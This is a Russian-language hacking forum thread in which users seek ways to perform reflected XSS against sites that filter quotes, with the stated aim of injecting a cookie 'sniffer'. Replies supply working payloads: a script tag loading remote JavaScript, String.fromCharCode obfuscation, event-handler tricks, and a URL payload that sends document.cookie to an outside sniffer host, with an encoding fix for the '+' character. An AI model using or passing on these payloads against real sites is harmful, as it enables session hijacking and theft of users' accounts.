Как можно произвести xss, если фильтруются кавычки?

Discussion in 'Уязвимости' started by 1ten0.0net1, 20 Apr 2006.

  1. 1ten0.0net1

    1ten0.0net1 Time out

    Joined:
    28 Nov 2005
    Messages:
    473
    Likes Received:
    330
    Reputations:
    389
    Скажите - как можно произвести xss, если фильтруются кавычки? Вариант с заменой на одинарные, %22 и на &/#22; , а также перенаправление на мой java-скрипт не предлагать. На серваке magic_quotes=on.
     
    #1 1ten0.0net1, 20 Apr 2006
    Last edited: 20 Apr 2006
    2 people like this.
  2. drmist

    drmist Member

    Joined:
    8 Oct 2005
    Messages:
    307
    Likes Received:
    94
    Reputations:
    80
    Одинарный ковычки тоже фильтруютя?
     
  3. Azazel

    Azazel Заведующий всем

    Joined:
    17 Apr 2005
    Messages:
    919
    Likes Received:
    213
    Reputations:
    154
    Ну в первых где тут кавычки? <SCRIPT SRC=http://site.com/xss.js></SCRIPT>

    А во вторых попробуй использовать String.fromCharCode
    (encoder http://www.paulschou.com/tools/xlate/)
     
  4. K[o]S

    K[o]S Member

    Joined:
    29 Jul 2005
    Messages:
    17
    Likes Received:
    5
    Reputations:
    4
    Ковычки могут понадобиться для того чтоб закрыть тег =)

    Автор поясни какого типа XSS актив пасив мыло форум и т.д
     
  5. 1ten0.0net1

    1ten0.0net1 Time out

    Joined:
    28 Nov 2005
    Messages:
    473
    Likes Received:
    330
    Reputations:
    389
    Вариант со внедрением ява-скрипта не подходит, как я и написал выше.
    Инъекция пассивная, одинарные фильтруются. Нужно внедрить адрес снифера. То, что знаю я - осуществляется через кавычки, поэтому прошу совета.
     
  6. Xex

    Xex Banned

    Joined:
    10 Jul 2005
    Messages:
    108
    Likes Received:
    41
    Reputations:
    7
    а просто тыги можешь использовать?...
    ну например картинку вставить?...
    HTML:
    <img src="тут твой код или адрес снифера">
    а далее можешь проверить:
    HTML:
    <script>alert(document.images[0].src)</script>
    Как дальше использовать думаю разберешься...
     
    1 person likes this.
  7. Laggi

    Laggi Elder - Старейшина

    Joined:
    19 Aug 2005
    Messages:
    43
    Likes Received:
    1
    Reputations:
    0
    Гм, аналогичная ситуация - пассивный Xss, фильтруется только ", '... Что можно сделать нехорошего без кавычек? :)
    Т.е. просто картинку вставить могу - там кавычки не нужны, а вот с запросом О_о...
     
  8. Laggi

    Laggi Elder - Старейшина

    Joined:
    19 Aug 2005
    Messages:
    43
    Likes Received:
    1
    Reputations:
    0
    r=<img%20src=http://antichat.ru/cgi-bin/s.jpg?><script>img%20=%20new%20Image();%20img.src%20=%20document.images[19].src+document.cookie;</script>
    К примеру не подходит
     
  9. Laggi

    Laggi Elder - Старейшина

    Joined:
    19 Aug 2005
    Messages:
    43
    Likes Received:
    1
    Reputations:
    0
    А, все, доперло - "+" = " "... как от этого избавиться? :) & нельзя использовать, сразу говорю.

    В виде "%ХХ" как "+" выглядит?

    UPD: усе, спасибо, нашел :) %2B - все работает
     
    #9 Laggi, 21 Apr 2006
    Last edited: 21 Apr 2006
  10. Del

    Del New Member

    Joined:
    24 Jan 2005
    Messages:
    6
    Likes Received:
    0
    Reputations:
    0
    так как запрос без кавычек выглядит?
     
  11. PaLb14

    PaLb14 Member

    Joined:
    29 Feb 2008
    Messages:
    25
    Likes Received:
    6
    Reputations:
    0
    Дак как все таки обойти, если мне нужно закрыть тэг а кавычку съедает?
     
  12. Bonnie and Clyde

    Bonnie and Clyde New Member

    Joined:
    26 Jul 2008
    Messages:
    7
    Likes Received:
    4
    Reputations:
    2
    вообщето тег закрывается без кавычки т.е. <тег>бла-бла</тег> возможно при ксс использовать OnMouseOver=xxx; BodyOnLoad=; etc...... учи html и JavaScript
     
  13. PaLb14

    PaLb14 Member

    Joined:
    29 Feb 2008
    Messages:
    25
    Likes Received:
    6
    Reputations:
    0
    Есть сайт в поиск ввожу <script>alert()</script> он все ставит в кавычки
    "<script>alert()</script>" меняю запрос на "><script>alert()</script> кавычка фильтруется на "&quot;"
     
  14. Don1=2

    Don1=2 Member

    Joined:
    10 Sep 2007
    Messages:
    0
    Likes Received:
    51
    Reputations:
    -19
    тогда с чего ты решил что там вообще есть ксс?
     
  15. PaLb14

    PaLb14 Member

    Joined:
    29 Feb 2008
    Messages:
    25
    Likes Received:
    6
    Reputations:
    0
    Дак вот я и спрашиваю может есть какой то обход этой фильтрации!?
     
Loading...